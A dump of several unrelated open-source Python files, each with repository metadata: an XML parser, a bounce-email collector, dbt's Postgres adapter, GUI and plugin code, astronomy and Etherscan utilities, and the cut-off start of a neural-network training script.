outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='errorType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='errorType'):
if self.message is not None and 'message' not in already_processed:
already_processed.append('message')
outfile.write(' message=%s' % (self.gds_format_string(quote_attrib(self.message).encode(ExternalEncoding), input_name='message'), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.append('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
def exportChildren(self, outfile, level, namespace_='', name_='errorType', fromsubclass_=False):
pass
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='errorType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.message is not None and 'message' not in already_processed:
already_processed.append('message')
showIndent(outfile, level)
outfile.write('message = "%s",\n' % (self.message,))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.append('type_')
showIndent(outfile, level)
outfile.write('type_ = "%s",\n' % (self.type_,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('message', node)
if value is not None and 'message' not in already_processed:
already_processed.append('message')
self.message = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.append('type')
self.type_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class errorType
class failureType(GeneratedsSuper):
"""The message specified in the assertThe type of the assert."""
subclass = None
superclass = None
def __init__(self, message=None, type_=None, valueOf_=None):
self.message = _cast(None, message)
self.type_ = _cast(None, type_)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if failureType.subclass:
return failureType.subclass(*args_, **kwargs_)
else:
return failureType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_message(self): return self.message
def set_message(self, message): self.message = message
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def export(self, outfile, level, namespace_='', name_='failureType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='failureType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='failureType'):
if self.message is not None and 'message' not in already_processed:
already_processed.append('message')
outfile.write(' message=%s' % (self.gds_format_string(quote_attrib(self.message).encode(ExternalEncoding), input_name='message'), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.append('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
def exportChildren(self, outfile, level, namespace_='', name_='failureType', fromsubclass_=False):
pass
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='failureType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.message is not None and 'message' not in already_processed:
already_processed.append('message')
showIndent(outfile, level)
outfile.write('message = "%s",\n' % (self.message,))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.append('type_')
showIndent(outfile, level)
outfile.write('type_ = "%s",\n' % (self.type_,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('message', node)
if value is not None and 'message' not in already_processed:
already_processed.append('message')
self.message = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.append('type')
self.type_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class failureType
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'testsuite'
rootClass = testsuite
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_=rootTag,
namespacedef_='')
return rootObj
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'testsuite'
rootClass = testsuite
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_="testsuite",
namespacedef_='')
return rootObj
def parseLiteral(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'testsuite'
rootClass = testsuite
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('#from JUnit_api import *\n\n')
sys.stdout.write('import JUnit_api as model_\n\n')
sys.stdout.write('rootObj = model_.rootTag(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"errorType",
"failureType",
"propertiesType",
"propertyType",
"system_err",
"system_out",
"testcaseType",
"testsuite",
"testsuiteType",
"testsuites"
]
| gpl-2.0 | 8,034,305,934,810,393,000 | 42.824417 | 205 | 0.606986 | false |
Durandaul/BounceBack_Script | prev_versions/bouncev1.py | 1 | 2827 | import imaplib
import re
import email as emlib
import json
import csv
mail = imaplib.IMAP4_SSL('imap.gmail.com')
regexMessage = b'Delivery to the following recipient failed permanently:\s{1,}.+\s'
find_bounce_back_message = re.compile(regexMessage)
regexEmail = b'.{1,}@.+'
find_email = re.compile(regexEmail)
def multipart_detector(maintype):
if maintype == 'multipart':
for part in email_message_instance.get_payload():
if part.get_content_maintype() == 'text':
return part.get_payload()
elif maintype == 'text':
return email_message_instance.get_payload()
def ok_detector(result, data):
if result == 'OK':
_data = data[0].split()
try:
rfc822 = [mail.uid('fetch', uid, '(RFC822)') for uid in _data]
print "Retrieved UIDs"
_data = [uid[1] for uid in rfc822]
return _data
except Exception as e:
print "Error Occured"
print e
def main(password):
_login = "[email protected]"
mail.login(_login,password)
mail.select("BounceBack")
_result, _data = mail.uid('search', None, "ALL")
_data = ok_detector(_result, _data)
#_sender_message = [] Fix so that it's the message and the email
_email = []
_errors, _success = 0,0
for email in _data:
_email_response = emlib.message_from_string(email[0][1])
_email_response = str(_email_response)
try:
_find_delivery_failed_message = find_bounce_back_message.search(_email_response)
_delivery_failed = str(_find_delivery_failed_message.group())
print "Found Match"
try:
_email_address = find_email.search(_delivery_failed)
_email_address = _email_address.group()
_email_address_stringified =str(_email_address)
_email_address_stringified = _email_address_stringified.strip()
print _email_address_stringified
_results.append(_email_address_stringified)
_success += 1
except AttributeError as e:
print "Couldn't find Email in string"
except AttributeError as e :
pass
if _results != None:
_results_size = len(_results)
with open('BounceBackNames.csv', 'wb') as csvfile:
output = csv.writer(csvfile, delimiter=' ')
output.writerow('Email Address:')
output.writerows(_results)
else:
print " Uh... Talk to Max I guess?"
if __name__ == '__main__':
with open('mySecret.json', 'rb') as jsonInFile:
try:
password =json.load(jsonInFile)['password']
print "Password Retrievel successful"
except Exception as e:
print e
main(password) | unlicense | -7,139,973,591,972,969,000 | 29.73913 | 92 | 0.585426 | false |
analyst-collective/dbt | plugins/postgres/dbt/adapters/postgres/connections.py | 1 | 5388 | from contextlib import contextmanager
import psycopg2
import dbt.exceptions
from dbt.adapters.base import Credentials
from dbt.adapters.sql import SQLConnectionManager
from dbt.contracts.connection import AdapterResponse
from dbt.logger import GLOBAL_LOGGER as logger
from dbt.helper_types import Port
from dataclasses import dataclass
from typing import Optional
@dataclass
class PostgresCredentials(Credentials):
host: str
user: str
port: Port
password: str # on postgres the password is mandatory
role: Optional[str] = None
search_path: Optional[str] = None
keepalives_idle: int = 0 # 0 means to use the default value
sslmode: Optional[str] = None
_ALIASES = {
'dbname': 'database',
'pass': 'password'
}
@property
def type(self):
return 'postgres'
def _connection_keys(self):
return ('host', 'port', 'user', 'database', 'schema', 'search_path',
'keepalives_idle', 'sslmode')
class PostgresConnectionManager(SQLConnectionManager):
TYPE = 'postgres'
@contextmanager
def exception_handler(self, sql):
try:
yield
except psycopg2.DatabaseError as e:
logger.debug('Postgres error: {}'.format(str(e)))
try:
self.rollback_if_open()
except psycopg2.Error:
logger.debug("Failed to release connection!")
pass
raise dbt.exceptions.DatabaseException(str(e).strip()) from e
except Exception as e:
logger.debug("Error running SQL: {}", sql)
logger.debug("Rolling back transaction.")
self.rollback_if_open()
if isinstance(e, dbt.exceptions.RuntimeException):
# during a sql query, an internal to dbt exception was raised.
# this sounds a lot like a signal handler and probably has
# useful information, so raise it without modification.
raise
raise dbt.exceptions.RuntimeException(e) from e
@classmethod
def open(cls, connection):
if connection.state == 'open':
logger.debug('Connection is already open, skipping open.')
return connection
credentials = cls.get_credentials(connection.credentials)
kwargs = {}
# we don't want to pass 0 along to connect() as postgres will try to
# call an invalid setsockopt() call (contrary to the docs).
if credentials.keepalives_idle:
kwargs['keepalives_idle'] = credentials.keepalives_idle
# psycopg2 doesn't support search_path officially,
# see https://github.com/psycopg/psycopg2/issues/465
search_path = credentials.search_path
if search_path is not None and search_path != '':
# see https://postgresql.org/docs/9.5/libpq-connect.html
kwargs['options'] = '-c search_path={}'.format(
search_path.replace(' ', '\\ '))
if credentials.sslmode:
kwargs['sslmode'] = credentials.sslmode
try:
handle = psycopg2.connect(
dbname=credentials.database,
user=credentials.user,
host=credentials.host,
password=credentials.password,
port=credentials.port,
connect_timeout=10,
**kwargs)
if credentials.role:
handle.cursor().execute('set role {}'.format(credentials.role))
connection.handle = handle
connection.state = 'open'
except psycopg2.Error as e:
logger.debug("Got an error when attempting to open a postgres "
"connection: '{}'"
.format(e))
connection.handle = None
connection.state = 'fail'
raise dbt.exceptions.FailedToConnectException(str(e))
return connection
def cancel(self, connection):
connection_name = connection.name
try:
pid = connection.handle.get_backend_pid()
except psycopg2.InterfaceError as exc:
# if the connection is already closed, not much to cancel!
if 'already closed' in str(exc):
logger.debug(
f'Connection {connection_name} was already closed'
)
return
# probably bad, re-raise it
raise
sql = "select pg_terminate_backend({})".format(pid)
logger.debug("Cancelling query '{}' ({})".format(connection_name, pid))
_, cursor = self.add_query(sql)
res = cursor.fetchone()
logger.debug("Cancel query '{}': {}".format(connection_name, res))
@classmethod
def get_credentials(cls, credentials):
return credentials
@classmethod
def get_response(cls, cursor) -> AdapterResponse:
message = str(cursor.statusmessage)
rows = cursor.rowcount
status_message_parts = message.split() if message is not None else []
status_messsage_strings = [
part
for part in status_message_parts
if not part.isdigit()
]
code = ' '.join(status_messsage_strings)
return AdapterResponse(
_message=message,
code=code,
rows_affected=rows
)
| apache-2.0 | -9,168,342,729,262,479,000 | 31.654545 | 79 | 0.591128 | false |
whermans/lurch | modules/plugins/magic8.py | 1 | 1123 | from modules.base.plugin import Plugin
import random
class Magic8Plugin(Plugin):
replies = [
'It is certain',
'It is decidely so',
'Without a doubt',
'Yes definitely',
'You may rely on it',
'As I see it, yes',
'Most likely',
'Outlook good',
'Yes',
'Signs point to yes',
'Reply hazy, try again',
'Ask again later',
'Better not tell you now',
'Cannot predict now',
'Concentrate and ask again',
'Don\'t count on it',
'My reply is no',
'My sources say no',
'Outlook not so good',
'Very doubtful'
]
def __init__(self, conn, cfg):
super(Magic8Plugin, self).__init__(conn, cfg, True)
def parse(self, message):
if "!magic8" in message:
if "?" in message:
self.message(random.choice(self.replies))
else:
self.message("That does not appear to be a question")
def tick(self):
pass
| gpl-2.0 | 2,005,214,860,410,350,800 | 27.075 | 69 | 0.479074 | false |
JonasThomas/free-cad | src/Mod/Surfaces/surfUtils/Translator.py | 1 | 2022 | #***************************************************************************
#* *
#* Copyright (c) 2011, 2012 *
#* Jose Luis Cercos Pita <[email protected]> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCAD, FreeCADGui, os
from PyQt4 import QtCore,QtGui
def translate(text,context="surfaces"):
"convenience function for Qt translator"
return QtGui.QApplication.translate(context, text, None,
QtGui.QApplication.UnicodeUTF8)
| lgpl-2.1 | 5,009,215,371,370,392,000 | 65.4 | 78 | 0.412957 | false |
onia/pygobject | demos/gtk-demo/demos/Icon View/iconviewbasics.py | 1 | 7312 | #!/usr/bin/env python
# -*- Mode: Python; py-indent-offset: 4 -*-
# vim: tabstop=4 shiftwidth=4 expandtab
#
# Copyright (C) 2010 Red Hat, Inc., John (J5) Palmieri <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301
# USA
title = "Icon View Basics"
description = """The GtkIconView widget is used to display and manipulate
icons. It uses a GtkTreeModel for data storage, so the list store example might
be helpful. We also use the Gio.File API to get the icons for each file type.
"""
import os
from gi.repository import GLib, Gio, GdkPixbuf, Gtk
class IconViewApp:
(COL_PATH,
COL_DISPLAY_NAME,
COL_PIXBUF,
COL_IS_DIRECTORY,
NUM_COLS) = list(range(5))
def __init__(self, demoapp):
self.pixbuf_lookup = {}
self.demoapp = demoapp
self.window = Gtk.Window()
self.window.set_title('Gtk.IconView demo')
self.window.set_default_size(650, 400)
self.window.connect('destroy', Gtk.main_quit)
vbox = Gtk.VBox()
self.window.add(vbox)
tool_bar = Gtk.Toolbar()
vbox.pack_start(tool_bar, False, False, 0)
up_button = Gtk.ToolButton(stock_id=Gtk.STOCK_GO_UP)
up_button.set_is_important(True)
up_button.set_sensitive(False)
tool_bar.insert(up_button, -1)
home_button = Gtk.ToolButton(stock_id=Gtk.STOCK_HOME)
home_button.set_is_important(True)
tool_bar.insert(home_button, -1)
sw = Gtk.ScrolledWindow()
sw.set_shadow_type(Gtk.ShadowType.ETCHED_IN)
sw.set_policy(Gtk.PolicyType.AUTOMATIC,
Gtk.PolicyType.AUTOMATIC)
vbox.pack_start(sw, True, True, 0)
# create the store and fill it with content
self.parent_dir = '/'
store = self.create_store()
self.fill_store(store)
icon_view = Gtk.IconView(model=store)
icon_view.set_selection_mode(Gtk.SelectionMode.MULTIPLE)
sw.add(icon_view)
# connect to the 'clicked' signal of the "Up" tool button
up_button.connect('clicked', self.up_clicked, store)
# connect to the 'clicked' signal of the "home" tool button
home_button.connect('clicked', self.home_clicked, store)
self.up_button = up_button
self.home_button = home_button
# we now set which model columns that correspond to the text
# and pixbuf of each item
icon_view.set_text_column(self.COL_DISPLAY_NAME)
icon_view.set_pixbuf_column(self.COL_PIXBUF)
# connect to the "item-activated" signal
icon_view.connect('item-activated', self.item_activated, store)
icon_view.grab_focus()
self.window.show_all()
def sort_func(self, store, a_iter, b_iter, user_data):
(a_name, a_is_dir) = store.get(a_iter,
self.COL_DISPLAY_NAME,
self.COL_IS_DIRECTORY)
(b_name, b_is_dir) = store.get(b_iter,
self.COL_DISPLAY_NAME,
self.COL_IS_DIRECTORY)
if a_name is None:
a_name = ''
if b_name is None:
b_name = ''
if (not a_is_dir) and b_is_dir:
return 1
elif a_is_dir and (not b_is_dir):
return -1
elif a_name > b_name:
return 1
elif a_name < b_name:
return -1
else:
return 0
def up_clicked(self, item, store):
self.parent_dir = os.path.split(self.parent_dir)[0]
self.fill_store(store)
# de-sensitize the up button if we are at the root
self.up_button.set_sensitive(self.parent_dir != '/')
def home_clicked(self, item, store):
self.parent_dir = GLib.get_home_dir()
self.fill_store(store)
# Sensitize the up button
self.up_button.set_sensitive(True)
def item_activated(self, icon_view, tree_path, store):
iter_ = store.get_iter(tree_path)
(path, is_dir) = store.get(iter_, self.COL_PATH, self.COL_IS_DIRECTORY)
if not is_dir:
return
self.parent_dir = path
self.fill_store(store)
self.up_button.set_sensitive(True)
def create_store(self):
store = Gtk.ListStore(str, str, GdkPixbuf.Pixbuf, bool)
# set sort column and function
store.set_default_sort_func(self.sort_func)
store.set_sort_column_id(-1, Gtk.SortType.ASCENDING)
return store
def file_to_icon_pixbuf(self, path):
pixbuf = None
# get the theme icon
f = Gio.file_new_for_path(path)
info = f.query_info(Gio.FILE_ATTRIBUTE_STANDARD_ICON,
Gio.FileQueryInfoFlags.NONE,
None)
gicon = info.get_icon()
# check to see if it is an image format we support
for GdkPixbufFormat in GdkPixbuf.Pixbuf.get_formats():
for mime_type in GdkPixbufFormat.get_mime_types():
content_type = Gio.content_type_from_mime_type(mime_type)
if content_type is not None:
break
#TODO: Here 'content_type' could be None, need to fix
try:
format_gicon = Gio.content_type_get_icon(content_type)
if format_gicon.equal(gicon):
gicon = f.icon_new()
break
except:
pass
if gicon in self.pixbuf_lookup:
return self.pixbuf_lookup[gicon]
if isinstance(gicon, Gio.ThemedIcon):
names = gicon.get_names()
icon_theme = Gtk.IconTheme.get_default()
for name in names:
try:
pixbuf = icon_theme.load_icon(name, 64, 0)
break
except GLib.GError:
pass
self.pixbuf_lookup[gicon] = pixbuf
elif isinstance(gicon, Gio.FileIcon):
icon_file = gicon.get_file()
path = icon_file.get_path()
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(path, 72, 72)
self.pixbuf_lookup[gicon] = pixbuf
return pixbuf
def fill_store(self, store):
store.clear()
for name in os.listdir(self.parent_dir):
path = os.path.join(self.parent_dir, name)
is_dir = os.path.isdir(path)
pixbuf = self.file_to_icon_pixbuf(path)
store.append((path, name, pixbuf, is_dir))
def main(demoapp=None):
IconViewApp(demoapp)
Gtk.main()
if __name__ == '__main__':
main()
| lgpl-2.1 | -6,643,193,018,444,488,000 | 31.789238 | 79 | 0.58657 | false |
setsulla/stir | project/magnolia/script/sinoalice/test_org.py | 1 | 1682 | import os
import sys
import time
from magnolia.utility import *
from magnolia.utility import LOG as L
from magnolia.script.sinoalice import testcase_normal
class TestCase(testcase_normal.TestCase):
def __init__(self, *args, **kwargs):
super(TestCase, self).__init__(*args, **kwargs)
@classmethod
def setUpClass(cls):
L.info("*** Start TestCase : %s *** " % __file__)
def test_1(self):
L.info("*** Capture ***")
try:
self.minicap_start(); time.sleep(2)
"""
self.assertTrue(self.reinstall()); time.sleep(2)
self.assertTrue(self.maintenance())
self.assertTrue(self.terms())
self.assertTrue(self.initial_gacha())
self.assertTrue(self.name())
self.assertTrue(self.download())
self.assertTrue(self.select()); time.sleep(5)
self.assertTrue(self.first_sweep()); time.sleep(5)
self.assertTrue(self.message_skip())
self.assertTrue(self.box()); time.sleep(2)
self.assertTrue(self.login_bonus()); time.sleep(2)
self.assertTrue(self.box()); time.sleep(5)
self.assertTrue(self.gacha()); time.sleep(2)
self.assertTrue(self.inherit())
"""
self.minicap_finish(); time.sleep(2)
except Exception as e:
L.warning(type(e).__name__ + ": " + str(e))
#L.warning(traceback.print_exc())
self.minicap_finish(); time.sleep(2)
self.minicap_create_video()
self.fail()
@classmethod
def tearDownClass(cls):
L.info("*** End TestCase : %s *** " % __file__)
| mit | 8,900,257,512,279,673,000 | 34.787234 | 62 | 0.561831 | false |
henry-ngo/VIP | vip_hci/preproc/subsampling.py | 1 | 4966 | #! /usr/bin/env python
"""
Module with pixel and frame subsampling functions.
"""
from __future__ import division
from __future__ import print_function
__author__ = 'C. Gomez @ ULg'
__all__ = ['cube_collapse',
'cube_subsample',
'cube_subsample_trimmean']
import numpy as np
def cube_collapse(cube, mode='median', n=50):
""" Collapses a cube into a frame (3d array to 2d array) depending on the
parameter *mode*. It's possible to perform a trimmed mean combination of the
frames based on description in Brandt+ 2012.
Parameters
----------
cube : array_like
Cube.
mode : {'median', 'mean', 'sum', 'trimmean'}, str optional
Sets the way of collapsing the images in the cube.
n : int, optional
Sets the discarded values at high and low ends. When n = N is the same
as taking the mean, when n = 1 is like taking the median.
Returns
-------
frame : array_like
Output array, cube combined.
"""
arr = cube
if not arr.ndim == 3:
raise TypeError('The input array is not a cube or 3d array.')
if mode=='mean':
frame = np.mean(arr, axis=0)
elif mode=='median':
frame = np.median(arr, axis=0)
elif mode=='sum':
frame = np.sum(arr, axis=0)
elif mode=='trimmean':
N = arr.shape[0]
if N % 2 == 0:
k = (N - n)//2
else:
k = (N - n)/2
frame = np.empty_like(arr[0])
for index, _ in np.ndenumerate(arr[0]):
sort = np.sort(arr[:,index[0],index[1]])
frame[index] = np.mean(sort[k:N-k])
return frame
def cube_subsample(array, n, mode="mean", parallactic=None, verbose=True):
"""Mean/Median combines frames in cube with window n.
Parameters
----------
n : int
Window for mean/median.
array : array_like
Input 3d array, cube.
mode : {'mean','median'}
Switch for choosing mean or median.
parallactic: array_like
List of corresponding parallactic angles.
Returns
-------
arr_view : array_like
Resulting array.
angles : array_like
Parallactic angles.
"""
if not array.ndim == 3:
raise TypeError('The input array is not a cube or 3d array.')
m = int(array.shape[0]/n)
resid = array.shape[0]%n
y = array.shape[1]
x = array.shape[2]
arr = np.empty([m, y, x])
if parallactic is not None:
angles = np.zeros(m)
if mode == 'median': func = np.median
elif mode=='mean': func = np.mean
else:
raise ValueError('Mode should be either Mean or Median.')
for i in range(m):
arr[i, :, :] = func(array[:n, :, :], axis=0)
if parallactic is not None: angles[i] = func(parallactic[:n])
if i >= 1:
arr[i, :, :] = func(array[n*i:n*i+n, :, :], axis=0)
if parallactic is not None:
angles[i] = func(parallactic[n*i:n*i+n])
if verbose:
print("Datacube subsampled by taking the {:} of {:} frames".format(mode ,n))
if resid > 0:
msg = "Initial # of frames and window are not multiples ({:} frames were dropped)"
print(msg.format(resid))
print("New cube contains {:} frames".format(m))
if parallactic is not None:
return arr, angles
else:
return arr
def cube_subsample_trimmean(arr, n, m):
"""Performs a trimmed mean combination every m frames in a cube. Based on
description in Brandt+ 2012.
Parameters
----------
arr : array_like
Cube.
n : int
Sets the discarded values at high and low ends. When n = N is the same
as taking the mean, when n = 1 is like taking the median.
m : int
Window from the trimmed mean.
Returns
-------
arr_view : array_like
Output array, cube combined.
"""
if not arr.ndim == 3:
raise TypeError('The input array is not a cube or 3d array.')
num = int(arr.shape[0]/m)
res = int(arr.shape[0]%m)
y = arr.shape[1]
x = arr.shape[2]
arr2 = np.empty([num+2, y, x])
for i in range(num):
arr2[0] = cube_collapse(arr[:m, :, :], 'trimmean', n)
if i > 0:
arr2[i] = cube_collapse(arr[m*i:m*i+m, :, :], 'trimmean', n)
arr2[num] = cube_collapse(arr[-res:, :, :], 'trimmean', n)
arr_view = arr2[:num+1] # slicing until m+1 - last index not included
print("\nDone trimmed mean over FITS-Cube with window m=" + str(m))
return arr_view
| mit | -7,150,221,523,624,467,000 | 31.03871 | 126 | 0.517519 | false |
Marto32/pyetherscan | tests/test_response.py | 1 | 1328 | """
Tests related to response objects.
"""
import unittest
import requests
from pyetherscan import client, response, error
class FakeResponse(requests.Response):
"""Fake instance of a Response object"""
def __init__(self, status_code, text):
requests.Response.__init__(self)
self.status_code = status_code
self._text = text
@property
def text(self):
return self._text
class BaseResponseTestCase(unittest.TestCase):
def setUp(self):
self.client = client.Client()
def base_request_error(self, code, text):
"""Abstract testing for request errors"""
resp = FakeResponse(code, text)
with self.assertRaises(error.EtherscanRequestError):
response.SingleAddressBalanceResponse(resp)
class TestInitializationResponses(BaseResponseTestCase):
def test_rate_limit_error(self):
self.base_request_error(403, '')
def test_invalid_request(self):
self.base_request_error(200, '')
def test_bad_code_error(self):
self.base_request_error(405, '')
def test_data_error(self):
text = "{\"message\":\"NOTOK\", \"result\":\"Error!\"}"
resp = FakeResponse(200, text)
with self.assertRaises(error.EtherscanDataError):
response.SingleAddressBalanceResponse(resp)
| mit | 777,112,246,740,399,900 | 24.538462 | 63 | 0.655873 | false |
mdmintz/SeleniumBase | seleniumbase/plugins/basic_test_info.py | 1 | 2407 | """
The plugin for saving basic test info to the logs for Selenium tests.
The created file will be saved in the default logs folder (in .../logs)
Data to be saved includes:
* Last page url
* Browser
* Server
* Error
* Traceback
"""
import os
import codecs
import time
import traceback
from nose.plugins import Plugin
from seleniumbase.config import settings
class BasicTestInfo(Plugin):
"""
This plugin will capture basic info when a test fails or
raises an error. It will store that basic test info in
the default logs or in the file specified by the user.
"""
name = "basic_test_info" # Usage: --with-basic_test_info
logfile_name = settings.BASIC_INFO_NAME
def options(self, parser, env):
super(BasicTestInfo, self).options(parser, env=env)
def configure(self, options, conf):
super(BasicTestInfo, self).configure(options, conf)
if not self.enabled:
return
self.options = options
def addError(self, test, err, capt=None):
test_logpath = self.options.log_path + "/" + test.id()
if not os.path.exists(test_logpath):
os.makedirs(test_logpath)
file_name = "%s/%s" % (test_logpath, self.logfile_name)
basic_info_file = codecs.open(file_name, "w+", "utf-8")
self.__log_test_error_data(basic_info_file, test, err, "Error")
basic_info_file.close()
def addFailure(self, test, err, capt=None, tbinfo=None):
test_logpath = self.options.log_path + "/" + test.id()
if not os.path.exists(test_logpath):
os.makedirs(test_logpath)
file_name = "%s/%s" % (test_logpath, self.logfile_name)
basic_info_file = codecs.open(file_name, "w+", "utf-8")
self.__log_test_error_data(basic_info_file, test, err, "Error")
basic_info_file.close()
def __log_test_error_data(self, log_file, test, err, type):
data_to_save = []
data_to_save.append("Last Page: %s" % test.driver.current_url)
data_to_save.append(" Browser: %s" % self.options.browser)
data_to_save.append("Timestamp: %s" % int(time.time()))
data_to_save.append("Server: %s " % self.options.servername)
data_to_save.append("%s: %s" % (type, err[0]))
data_to_save.append("Traceback: " + ''.join(
traceback.format_exception(*err)))
log_file.writelines("\r\n".join(data_to_save))
| mit | -3,147,112,503,173,750,300 | 35.469697 | 71 | 0.631491 | false |
edux300/research | train_loop.py | 1 | 16163 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 19 17:20:10 2017
@author: eduardo
"""
import funcs.patch_loader as pl
import tensorflow as tf
import funcs.utils as ut
import cnns.cnn_models as models
import numpy as np
import os
import funcs.image_processing as iproc
from matplotlib import pyplot as plt
import pickle as pkl
from shutil import copyfile
def print_s(string,file):
print(string)
print(string,file=file)
def train_loop(experiment_name, model_number, dataset_path, batch_norm=False, dropout=False):
"""
DEFINE PARAMETERS
"""
#experiment_name = "test_experiment"
#model_number = 1 # DEFINES IF THIS IS THE FIRST OR SECOND MODEL IN THE CASCADE
model = models.detector36(False, "model"+str(model_number), False, batch_norm=batch_norm ,dropout=dropout) # MODEL ARCHITECTURE
# LEARNING PARAMETERS
learning_rate = 0.0001
#training_iterations = int(5e3) # TRAINING ITERATIONS
training_iterations = int(5e3)
one_epoch_every = 1e2 # ITERATIONS PER EPOCH
number_of_epochs = int(training_iterations/one_epoch_every)+1
"""
PATH:
RESULTS
"""
results_path = "/home/eduardo/Results/"+experiment_name
if model_number == 1:
os.mkdir(results_path)
log_file = open(results_path+"/log"+str(model_number)+".txt","w") # LOG FILE
metrics_save_path = results_path+"/metrics"+str(model_number)+".npy"
save_weights_path = results_path+"/model"+str(model_number)
os.mkdir(save_weights_path)
load_weights_path = None
if model_number == 2:
load_weights_path = results_path+"/model1"
"""
DATASET
"""
#dataset_path = "/home/eduardo/dataset_name"
#if model_number == 2:
# dataset_path += "second"
evaluation_metric_index = 1 #DEFINES THE POSITION OF THE METRIC USED FOR COMPARISSON
